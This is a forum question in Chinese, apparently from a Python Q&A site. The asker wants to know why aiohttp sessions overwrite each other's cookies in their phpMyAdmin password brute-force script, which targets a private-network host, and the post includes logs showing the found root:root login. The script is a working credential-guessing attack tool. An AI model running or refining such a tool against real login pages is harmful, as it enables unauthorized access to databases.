为什么会覆盖cookie?

2024-05-13 05:16:52 发布

您现在位置:Python中文网/ 问答频道 /正文
7999 3

我使用asyncio和aiohttp请求phpmyadmin,不同的会话,但不同的会话覆盖cookie。 代码:

from asyncio import FIRST_COMPLETED

import aiohttp
import json
import re
import asyncio
from handle_log import logger

# 使用IP域名时,需要设置cookie
jar = aiohttp.CookieJar(unsafe=True)


async def handle_request(session, url, method, data=None, **kwargs):
    """处理请求"""
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
    }
    if method == "GET":
        try:
            async with session.get(url=url, headers=header) as response:
                text = await response.text()
                code = response.status
                return code, text
        except Exception as e:
            # print(str(e))
            return None, None
    elif method == "POST":
        try:
            async with session.post(url=url, headers=header, data=data, allow_redirects=False) as response:
                text = await response.text()
                code = response.status
                return code, text
        except Exception as e:
            # print(str(e))
            return None, None


async def phpmyadmin_crack(host, username, password):
    """phpmyadmin密码爆破"""
    async with aiohttp.ClientSession(cookie_jar=jar) as session:
        logger.info("请求用户名:{},密码{},session:{}".format(username, password, id(session)))
        url = host + "/phpmyadmin/index.php"
        # 第一次请求获取token
        first_code, first_response = await handle_request(session=session, url=url, method="GET")
        if not first_response and first_code != 200:
            # logger.info("第一次请求失败,用户名:{},密码{}".format(username, password))
            return False
        if first_code == 200:
            # 获取token
            token_search = re.compile(r'token=(.*?)"\s?target')
            token = token_search.search(first_response)

            if not token:
                # logger.info("第一次请求未获取到token,用户名:{},密码{}".format(username, password))
                return False
            else:
                token_value = token.group(1)
                logger.info("第一次请求token:{},用户名:{},密码{},session:{}".format(token_value, username, password, id(session)))
                login_url = host + "/phpmyadmin/index.php"
                # 第二次请求登录
                login_data = {
                    "pma_username": username,
                    "pma_password": password,
                    "server": "1",
                    "lang": "zh_CN",
                    "token": token_value
                }
                second_code, second_response = await handle_request(session=session, url=login_url,
                                                                    method="POST",
                                                                    data=login_data)
                logger.info(
                    "第二次请求cookie{},用户名{},密码{},session:{}".format(session.cookie_jar.filter_cookies(login_url), username,
                                                                 password, id(session)))
                if not second_response and second_code != 302:
                    # logger.info("第二次请求失败,用户名:{},密码{}".format(username, password))
                    return False
                else:
                    # 首页
                    logger.info("第三次请求,用户名:{},密码{},session:{}".format(username, password, id(session)))
                    index_url = host + "/phpmyadmin/main.php?token={}".format(token_value)
                    index_code, index_response = await handle_request(session=session, url=index_url,
                                                                      method="GET")
                    if not index_response and index_code != 200:
                        # logger.info("第三次请求失败,用户名:{},密码{}".format(username, password))
                        return False
                    if index_code == 200:
                        if "常规设置" in index_response:
                            logger.info("登录成功cookie{},用户名{},密码{},session{}".format(session.cookie_jar.filter_cookies(index_url),
                                                                         username, password, id(session)))
                            return token_value

async def main():
    u = ["admin", "root"]
    p = ["root", "ccc"]
    for username in u:
        tasks = [asyncio.create_task(phpmyadmin_crack("http://192.168.52.143", username, password)) for password in p]
        done, pending = await asyncio.wait(tasks, return_when=FIRST_COMPLETED)
        for i in done:
            token_value = i.result()
            if token_value:
                # print(pending)
                for j in pending:
                    j.cancel()
                return


if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())

日志

2021-01-23 13:59:40,554 - 请求用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,620 - 第一次请求token:83f68fe795cd035027e28b932e66af86,用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,696 - 第二次请求cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名admin,密码root,session:61479400
2021-01-23 13:59:43,697 - 第三次请求,用户名:admin,密码root,session:61479400


2021-01-23 13:59:40,556 - 请求用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,683 - 第一次请求token:630fc3f0e38913813ae969b03be4e7d7,用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=eN9lDZNBfIk%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第三次请求,用户名:admin,密码ccc,session:61479448


2021-01-23 13:59:42,141 - 请求用户名:root,密码root,session:61477480
2021-01-23 13:59:42,370 - 第一次请求token:f75a63d7b1a99ceede06913c2fa028ae,用户名:root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=5gfZy4sGqjs%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第三次请求,用户名:root,密码root,session:61477480
2021-01-23 13:59:43,845 - 登录成功cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名root,密码root,session:61477480


2021-01-23 13:59:42,142 - 请求用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,503 - 第一次请求token:172c4fea1a9166732b23bda80efe80ad,用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第三次请求,用户名:root,密码ccc,session:54297720

正确的用户名和密码是root:root aiohttp为什么会覆盖cookie

设置Cookie:pmaPass-1=5gfZy4sGqjs%3D
设置Cookie:pmaUser-1=5gfZy4sGqjs%3D

设置Cookie:pmaPass-1=ZGyrDGMUOfY%3D
设置Cookie:pmaUser-1=CWWqYangAdc%3D


Tags: tokenurl密码indexreturncookieresponsesession
0条回答

目前没有回答

相关问题 更多 >

    编程相关推荐